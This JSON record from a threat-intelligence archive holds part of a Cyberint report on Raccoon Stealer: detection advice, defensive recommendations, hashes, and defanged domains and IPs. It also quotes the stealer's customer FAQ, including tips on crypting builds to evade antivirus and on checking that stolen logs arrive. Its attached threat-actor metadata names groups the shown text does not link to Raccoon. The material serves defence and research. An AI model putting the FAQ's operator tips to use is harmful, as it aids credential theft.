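A single lookalike lookup is worth a ticket on its own, but the pairing matters: the client that fetched a profile from telete.in and then posted first a few hundred bytes and then a multi-megabyte body to a bare-IP /gate/log.php is the one whose Log.zip has already left the network, so that host's credentials and session cookies should be treated as exposed, not just the machine as infected.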
This proactive stance and the integration of cutting-edge technologies will better equip the cybersecurity community to safeguard against these persistent threats and minimize potential breaches.\r\nRecommendations to Protect Against Raccoon Stealer\r\n• Develop and enforce a comprehensive security policy that outlines best practices for employees, including guidelines on password management, email usage, and software updates.\r\n• Provide regular security awareness training to employees to educate them about the risks of infostealer malware, phishing attacks, and safe online practices.\r\n• Implement robust endpoint security solutions, including advanced antivirus and anti-malware software, to detect and prevent infostealer infections on devices used within the organization.\r\n• Ensure that email security controls are applied to limit the delivery of potentially malicious attachments or links to end-users, and implement email authentication controls such as SPF, DKIM and DMARC.\r\n• Enforce MFA for access to sensitive systems and applications, adding an extra layer of security even if credentials are compromised. Note that infostealers also take session cookies, which can be replayed to bypass MFA, so exposed sessions should be revoked alongside any password reset.\r\n• Develop and regularly update an incident response plan that outlines the steps to take in case of an infostealer malware incident. This plan should include isolation, containment, eradication, and recovery procedures.\r\n• Conduct regular security audits and assessments to ensure that your security practices align with industry standards and regulation.\r\n• Those using cryptocurrencies should consider the use of hardware-based wallets and ensure that payment addresses are verified before submitting a transaction.\r\nCyberint and the Dark Web\r\nCyberint excels in accessing high-tier sources that remain elusive to most companies. Our unique ability to penetrate these hidden corners enables us to collect and analyze invaluable data. 
We enrich our automated collection with a human approach, through research and analysis by our military-grade expert team.\r\nFind new sources in deep and dark web marketplaces, forums, and sites, even if those sources are volatile and difficult to track. Get deep analysis and reports that allow you to understand a specific threat actor and group profiling, including the places of operation, targeted countries or verticals, TTPs and more. Get a demo and see what assets you have exposed on the deep \u0026 dark web.\r\nIndicators of Compromise\r\nSHA256 Hashes\r\nThe following samples were observed in May 2021 and may be beneficial for those seeking to further understand the nature of this threat:\r\n012e382049b88808e2d0b26e016dc189f608deea9b6cc993ce24a57c99dd93d1\r\n18c27b85f26566dd782171e00ea5b5872546b23526cca0ebb185caca35fdec93\r\n24499fbfd8a2b2663899841f3cf424b60d60c26351b5d491fd475adf9e301256\r\n3c5120a6e894b64924dc44f3cdc0da65f277b32870f73019cefeacf492663c0e\r\n40175d0027919244b6b56fe5276c44aba846d532501e562da37831403c9ed44e\r\n624b7ae8befcf91dbf768d9703147ac8f9bd46b08ffe14a75c77e88736bf07d0\r\n75c3a83073d9b15d4f47308b5d688f1ec07422419e3bd54e78f6ef8683d42e5c\r\n8815b21c44c22aec31f7fa6e69dcb83a60c572f8365ff02b5c6f12154e01a4c2\r\n97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9\r\na2420c7f0c7bf5d3c0893aff6b7440a09c0531632434d2bbb6f8ed98b04317b9\r\nbfb37c9adc809e880f56dd10898b5425242330d6e2fa69e014a98e6dc18ce416\r\ncaf3eca514de58e215b5e9f568f748293be64a3c82e15c2f905903cd9bfacc1c\r\nde7ccff53ca27db1ed1e3e0d0df07f2e3364ec6b7e60622dc7726cba56831eb7\r\nDomains\r\ntelete[.]in – Initial ‘call home’ to an unofficial Telegram service\r\ntelecut[.]in – Suspicious domain related to telete[.]in\r\ntgraph[.]io – Suspicious domain related to telete[.]in\r\ntttttt[.]me – Initial ‘call home’ to an unofficial Telegram service\r\ntelegram[.]cat – Suspicious domain 
related to tttttt[.]me\r\ntelegram[.]services – Suspicious domain related to tttttt[.]me\r\ntlgr[.]org – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]click ( т[.]click ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]link ( т[.]link ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]live ( т[.]live ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]site ( т[.]site ) – Suspicious domain related to tttttt[.]me\r\nxn--r1a[.]website ( т[.]website ) – Suspicious domain related to tttttt[.]me\r\nIP Addresses\r\n195.201.225[.]248 – Resolves to telete[.]in and related domains\r\n95.216.186[.]40 – Resolves to tttttt[.]me and related domains\r\nAppendix A – Raccoon Stealer ‘User Agreement’\r\nExtracted from the currently deployed Raccoon Stealer control panel, the following text is presented as the ‘User\r\nAgreement’ that subscribers must accept.\r\nUser agreement\r\nBy paying (by becoming a customer) Raccoon Stealer (hereinafter referred to as the service) you agree\r\nThis user agreement is final and non-negotiable.\r\nOur service does not work and will never be in the CIS. Discussion of this in the chat will be punish\r\nWe are only responsible for the correct operation of our service. No third-party services apply to th\r\nWe are not responsible for the ratio, because a huge number of elements are involved in the process o\r\nWe are not responsible for logs stored in our panel for more than 2 months. 
Logs of inactive clients\r\nAppendix B – Raccoon Stealer FAQ\r\nExtracted from the currently deployed control panel, the following text is presented as a frequently asked\r\nquestions (FAQ) page for subscribers.\r\nQ0. How long do you store logs if my account is inactive?\r\nA0. We are not responsible for logs stored in our panel for more than 2 months. Logs of inactive clients are del\r\nQ1. Where can I find info about my account and set it up?\r\nA1. Click on your nick on the sidebar. This is your profile. You can see your install statistics there. Also lic\r\nQ2. How can I protect my account?\r\nA2. You can change your password in your profile settings. Also you can set up 2FA for your account.\r\nQ3. How do I know about your product updates?\r\nA3. Click on News button on the sidebar. If you haven't read messages yet, you will see red circle sign. Importa\r\nQ4. How to test and download my build?\r\nA4: Click on Build button on the sidebar. Click on the Add Build button on the top of the menu. Your build will\r\nQ5. In what file formats is your build available?\r\nA5. In *.EXE and *.DLL\r\nQ6. Does your build work at Low Integrity Level?\r\nA6. Yes!\r\nQ7. Must I crypt your build?\r\nA7. It's necessary. By using clean build you increase AV detects quantity. It will affect your results and resul\r\nQ8. Why must I test the build?\r\nA8. We always ask our users to make these steps:\r\n 1) Test with 'test button' in panel\r\n 2) Test on virtual or real Windows machine\r\n 3) Check log archive from Windows machine if everything is stealed fine\r\nQ9. Should I generate new build after gate change, update, etc.?\r\nA9. No! This is our difference from other info-stealing software. You can keep working with same build and it wi\r\nQ10. Why can I generate only one build?\r\nA10. This was made to avoid speculation and use of the account by several people. 
We are planning to add multi-b\r\nQ11. How to create and use configs?\r\nA11: On the top of the \"Builds\" you can see \"Add config\" button. You must add config name. After that you can ch\r\nQ12. Must I generate new build after config change?\r\nA12. No. Raccoon loads configuration from the server. You can edit your config on the go with no rebuild require\r\nQ13. Does Raccoon work on CIS PC's?\r\nA13. No for all. If you run Raccoon of PC with CIS language or IP, it will stop working. Don't be surprised with\r\n No! And don't even ask about it. Also notice if you will run our file on RU or CIS machine nothing will hap\r\nQ14. How can I save my search parameters?\r\nA14: Just fill \"Mask name\" box and make a search. Button with your search template will appear on the top of you\r\nQ15. What do logs statuses mean?\r\nA15: \"NEW\" - new log which has not been opened or downloaded yet.\r\n \"OPEN\" - log which one was opened or downloaded (or you viewed passwords/links/cookies).\r\n \"DOUBLE\" - someone in the panel has the same log. So it may mean your traffic was sold to many hands.\r\n \"TEST\" - test log from our virtual machine. - Deprecated\r\n \"VM\" - log from VM (this function in demo mode now). - Deprecated\r\nQ16. I'm receiving so many EMPTY logs. Why?\r\nA16: 1. Stealer knocks to the gate on the start of his work.\r\n 2. \"EMPTY\" log will appear in your panel.\r\n 3. Soft collects data and sends archive to the gate.\r\n4. Panel parse data from log and give log status \"NEW\".\r\n If after some time status has not changed, Raccoon died in the battle with antivirus. Or upload speed on th\r\nQ17. Can you share contacts of crypt, traffic or install guys?\r\nA17. We are working on support and updates only. We can not guarantee successful work of people who sell certain\r\nQ18. 
I have a logs store and I need CSV table for it.\r\nA18: On the top of the logs tab you can see \"CSV\" button. Feel free to use it.\r\nQ19. I can't download all logs at once, what should I do?\r\nA19. In case of high load, the multi-download process may fail. Please download less then 2000 logs per multi-do\r\nQ20. What if I have issues with particular log?\r\nA20: Place your mouse arrow on the date of log, you \"Bot ID\" of this log. Send this information to one of our su\r\nQ21. How do you monitor the status of your system?\r\nA21. We have set up alarm system for all important nodes. We track AV detects and health of our gates and make d\r\nQ22. What influences my ratio?\r\nA22. There are a lot of factors that affect ratio. From crypt to methods of spreading your malware. Also your co\r\nQ23. What maximum file size can Raccoon grab?\r\nA23. 100 Mb\r\nQ24. Can I host your panel on my server?\r\nA24. No for all.\r\nQ25. What will happen with my logs if my license time is over?\r\nA25. We are not responsible for logs stored in our panel for more than 2 months. Logs of inactive clients are de\r\nQ26. Can I load multiple files with your loader option?\r\nA26. Yes you can.\r\nQ27. Where can I leave my wishes about work of your soft and panel?\r\nA27. Please contact our support. We also give constant consideration to our customers' ideas.\r\nQ28. I am receiving API Error.\r\nA28. This is happen due to that back-end and front-end hosts on separate servers and your node doesn't receive o\r\nSource: https://cyberint.com/blog/financial-services/raccoon-stealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cyberint.com/blog/financial-services/raccoon-stealer/"
	],
	"report_names": [
		"raccoon-stealer"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434259,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c0dfd25d62f8d7bf789a3bce879ccd046bed2167.pdf",
		"text": "https://archive.orkl.eu/c0dfd25d62f8d7bf789a3bce879ccd046bed2167.txt",
		"img": "https://archive.orkl.eu/c0dfd25d62f8d7bf789a3bce879ccd046bed2167.jpg"
	}
}